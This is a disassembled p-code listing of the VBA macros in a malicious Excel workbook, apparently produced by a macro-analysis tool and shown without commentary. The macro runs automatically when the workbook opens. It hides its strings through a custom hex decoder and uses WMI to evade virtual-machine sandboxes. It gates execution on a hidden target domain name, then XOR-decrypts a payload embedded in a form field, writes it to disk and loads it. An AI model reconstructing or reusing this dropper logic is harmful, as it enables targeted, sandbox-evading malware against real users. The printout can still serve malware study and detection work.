 _VBA_PROJECT_CUR/VBA/ThisWorkbook - 1785 bytes
 Line #0:
 	FuncDefn (Sub Workbook_Open())
 Line #1:
 	Ld Sheet1 
 	ArgsMemCall folderol 0x0000 
 Line #2:
 	EndSub 
 Line #3:
 Line #4:
 	FuncDefn (Sub Auto_Open())
 Line #5:
 	Ld Sheet1 
 	ArgsMemCall folderol 0x0000 
 Line #6:
 	EndSub 
 _VBA_PROJECT_CUR/VBA/Sheet1 - 10518 bytes
 Line #0:
 	LineCont 0x0004 06 00 00 00
 	FuncDefn (Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef dwflags As Long, ByVal dwReserved As Long) As Long)
 Line #1:
 Line #2:
 	LineCont 0x000C 08 00 03 00 10 00 03 00 1A 00 03 00
 	FuncDefn (Private Declare PtrSafe Function mciSendString Lib "winmm.dll" (ByVal lpstrCommand As String, ByVal lpstrReturnString As , ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long)
 Line #3:
 Line #4:
 	LineCont 0x0004 08 00 04 00
 	FuncDefn (Private Declare Function GetShortPathName Lib "kernel32" (ByVal lpszLongPath As String, ByVal lpszShortPath As String, ByVal lBuffer As Long) As Long)
 Line #5:
 Line #6:
 	FuncDefn (Public Function GetInternetConnectedState(id_FFFE As Boolean) As Boolean)
 Line #7:
 	LitDI4 0x0000 0x0000 
 	LitDI4 0x0000 0x0000 
 	ArgsLd InternetGetConnectedState 0x0002 
 	St GetInternetConnectedState 
 Line #8:
 	EndFunc 
 Line #9:
 Line #10:
 	FuncDefn (Function rigmarole(es As String, id_FFFE As String) As String)
 Line #11:
 	Dim 
 	VarDefn furphy (As String)
 Line #12:
 	Dim 
 	VarDefn c (As Integer)
 Line #13:
 	Dim 
 	VarDefn s (As String)
 Line #14:
 	Dim 
 	VarDefn cc (As Integer)
 Line #15:
 	LitStr 0x0000 ""
 	St furphy 
 Line #16:
 	StartForVariable 
 	Ld i 
 	EndForVariable 
 	LitDI2 0x0001 
 	Ld es 
 	FnLen 
 	LitDI2 0x0004 
 	ForStep 
 Line #17:
 	LitStr 0x0002 "&H"
 	Ld es 
 	Ld i 
 	LitDI2 0x0002 
 	ArgsLd Mid 0x0003 
 	Concat 
 	ArgsLd CDec 0x0001 
 	St c 
 Line #18:
 	LitStr 0x0002 "&H"
 	Ld es 
 	Ld i 
 	LitDI2 0x0002 
 	Add 
 	LitDI2 0x0002 
 	ArgsLd Mid 0x0003 
 	Concat 
 	ArgsLd CDec 0x0001 
 	St s 
 Line #19:
 	Ld c 
 	Ld s 
 	Sub 
 	St cc 
 Line #20:
 	Ld furphy 
 	Ld cc 
 	ArgsLd Chr 0x0001 
 	Add 
 	St furphy 
 Line #21:
 	StartForVariable 
 	Ld i 
 	EndForVariable 
 	NextVar 
 Line #22:
 	Ld furphy 
 	St rigmarole 
 Line #23:
 	EndFunc 
 Line #24:
 Line #25:
 	FuncDefn (Function folderol(id_FFFE As Variant))
 Line #26:
 	Dim 
 	VarDefn wabbit (As Byte)
 Line #27:
 	Dim 
 	VarDefn fn (As Integer)
 	BoS 0x0000 
 	Ld FreeFile 
 	St fn 
 Line #28:
 	Dim 
 	VarDefn onzo (As String)
 Line #29:
 	Dim 
 	VarDefn mf (As String)
 Line #30:
 	Dim 
 	VarDefn xertz (As Variant)
 Line #31:
 	Dim 
 	LitDI2 0x0000 
 	LitDI2 0x0007 
 	VarDefn buff (As Byte)
 Line #32:
 Line #33:
 	Ld F 
 	MemLd L 
 	LitStr 0x0001 "."
 	ArgsLd Split 0x0002 
 	St onzo 
 Line #34:
 Line #35:
 	Ld GetInternetConnectedState 
 	LitVarSpecial (False)
 	Eq 
 	IfBlock 
 Line #36:
 	LitStr 0x0025 "Cannot establish Internet connection."
 	Ld vbCritical 
 	LitStr 0x0005 "Error"
 	ArgsCall MsgBox 0x0003 
 Line #37:
 	End 
 Line #38:
 	EndIfBlock 
 Line #39:
 Line #40:
 	SetStmt 
 	LitDI2 0x0007 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	ArgsLd GetObject 0x0001 
 	Set fudgel 
 Line #41:
 	SetStmt 
 	LitDI2 0x0008 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	ParamOmitted 
 	LitDI2 0x0030 
 	Ld fudgel 
 	ArgsMemLd ExecQuery 0x0003 
 	Set twattling 
 Line #42:
 	StartForVariable 
 	Ld p 
 	EndForVariable 
 	Ld twattling 
 	ForEach 
 Line #43:
 	Dim 
 	VarDefn pos (As Integer)
 Line #44:
 	Ld p 
 	MemLd Name 
 	ArgsLd LCase 0x0001 
 	LitStr 0x0003 "vmw"
 	FnInStr 
 	Ld p 
 	MemLd Name 
 	ArgsLd LCase 0x0001 
 	LitStr 0x0003 "vmt"
 	FnInStr 
 	Add 
 	Ld p 
 	MemLd Name 
 	ArgsLd LCase 0x0001 
 	LitDI2 0x0009 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	FnInStr 
 	Add 
 	St pos 
 Line #45:
 	Ld pos 
 	LitDI2 0x0000 
 	Gt 
 	IfBlock 
 Line #46:
 	LitDI2 0x0004 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	Ld vbCritical 
 	LitDI2 0x0006 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	ArgsCall MsgBox 0x0003 
 Line #47:
 	End 
 Line #48:
 	EndIfBlock 
 Line #49:
 	StartForVariable 
 	Next 
 Line #50:
 Line #51:
 	LitHI2 0x0011 
 	LitHI2 0x0022 
 	LitHI2 0x0033 
 	LitHI2 0x0044 
 	LitHI2 0x0055 
 	LitHI2 0x0066 
 	LitHI2 0x0077 
 	LitHI2 0x0088 
 	LitHI2 0x0099 
 	LitHI2 0x00AA 
 	LitHI2 0x00BB 
 	LitHI2 0x00CC 
 	LitHI2 0x00DD 
 	LitHI2 0x00EE 
 	ArgsArray Array 0x000E 
 	St xertz 
 Line #52:
 Line #53:
 	SetStmt 
 	LitDI2 0x000A 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	ArgsLd CreateObject 0x0001 
 	Set groke 
 Line #54:
 	Ld groke 
 	MemLd UserDomain 
 	St firkin 
 Line #55:
 	Ld firkin 
 	LitDI2 0x0003 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	Ne 
 	IfBlock 
 Line #56:
 	LitDI2 0x0004 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	Ld vbCritical 
 	LitDI2 0x0006 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	ArgsCall MsgBox 0x0003 
 Line #57:
 	End 
 Line #58:
 	EndIfBlock 
 Line #59:
 Line #60:
 	Ld firkin 
 	FnLen 
 	St n 
 Line #61:
 	StartForVariable 
 	Ld i 
 	EndForVariable 
 	LitDI2 0x0001 
 	Ld n 
 	For 
 Line #62:
 	Ld firkin 
 	Ld i 
 	LitDI2 0x0001 
 	ArgsLd Mid$ 0x0003 
 	ArgsLd Asc 0x0001 
 	Ld n 
 	Ld i 
 	Sub 
 	ArgsSt buff 0x0001 
 Line #63:
 	StartForVariable 
 	Next 
 Line #64:
 Line #65:
 	Ld F 
 	MemLd T 
 	MemLd Text 
 	LitDI2 0x0002 
 	LitDI4 0x5C21 0x0004 
 	Ld buff 
 	ArgsLd canoodle 0x0004 
 	St wabbit 
 Line #66:
 	LitDI2 0x0000 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	ArgsLd Environ 0x0001 
 	LitDI2 0x000B 
 	ArgsLd onzo 0x0001 
 	ArgsLd rigmarole 0x0001 
 	Concat 
 	St mf 
 Line #67:
 	Ld mf 
 	Ld fn 
 	Sharp 
 	LitDefault 
 	Open (For Binary Lock Read Write)
 Line #68:
 	Ld fn 
 	Sharp 
 	LitDefault 
 	Ld wabbit 
 	PutRec 
 Line #69:
 	Ld fn 
 	Sharp 
 	Close 0x0001 
 Line #70:
 Line #71:
 	SetStmt 
 	Ld mf 
 	LitVarSpecial (False)
 	LitVarSpecial (True)
 	LitDI2 0x000C 
 	LitDI2 0x0016 
 	LitDI2 0x0258 
 	LitDI2 0x0136 
 	Ld Sheet1 
 	MemLd Shapes 
 	ArgsMemLd AddPicture 0x0007 
 	Set panuding 
 Line #72:
 	EndFunc 
 Line #73:
 Line #74:
 	FuncDefn (Function canoodle(panjandrum As String, ardylo As Integer, s As Long, bibble As Variant, id_FFFE As ) As Append)
 Line #75:
 	Dim 
 	VarDefn quean (As Long)
 Line #76:
 	Dim 
 	VarDefn cattywampus (As Long)
 Line #77:
 	Dim 
 	VarDefn kerfuffle (As Byte)
 Line #78:
 	OptionBase 
 	Ld s 
 	Redim kerfuffle 0x0001 (As Variant)
 Line #79:
 	LitDI2 0x0000 
 	St quean 
 Line #80:
 	StartForVariable 
 	Ld cattywampus 
 	EndForVariable 
 	LitDI2 0x0001 
 	Ld panjandrum 
 	FnLen 
 	LitDI2 0x0004 
 	ForStep 
 Line #81:
 	LitStr 0x0002 "&H"
 	Ld panjandrum 
 	Ld cattywampus 
 	Ld ardylo 
 	Add 
 	LitDI2 0x0002 
 	ArgsLd Mid 0x0003 
 	Concat 
 	Coerce (Byte) 
 	Ld quean 
 	Ld bibble 
 	FnUBound 0x0000 
 	LitDI2 0x0001 
 	Add 
 	Paren 
 	Mod 
 	ArgsLd bibble 0x0001 
 	Xor 
 	Ld quean 
 	ArgsSt kerfuffle 0x0001 
 Line #82:
 	Ld quean 
 	LitDI2 0x0001 
 	Add 
 	St quean 
 Line #83:
 	Ld quean 
 	Ld kerfuffle 
 	FnUBound 0x0000 
 	Eq 
 	IfBlock 
 Line #84:
 	ExitFor 
 Line #85:
 	EndIfBlock 
 Line #86:
 	StartForVariable 
 	Ld cattywampus 
 	EndForVariable 
 	NextVar 
 Line #87:
 	Ld kerfuffle 
 	St canoodle 
 Line #88:
 	EndFunc 
 Line #89:
 _VBA_PROJECT_CUR/VBA/F - 1388 bytes
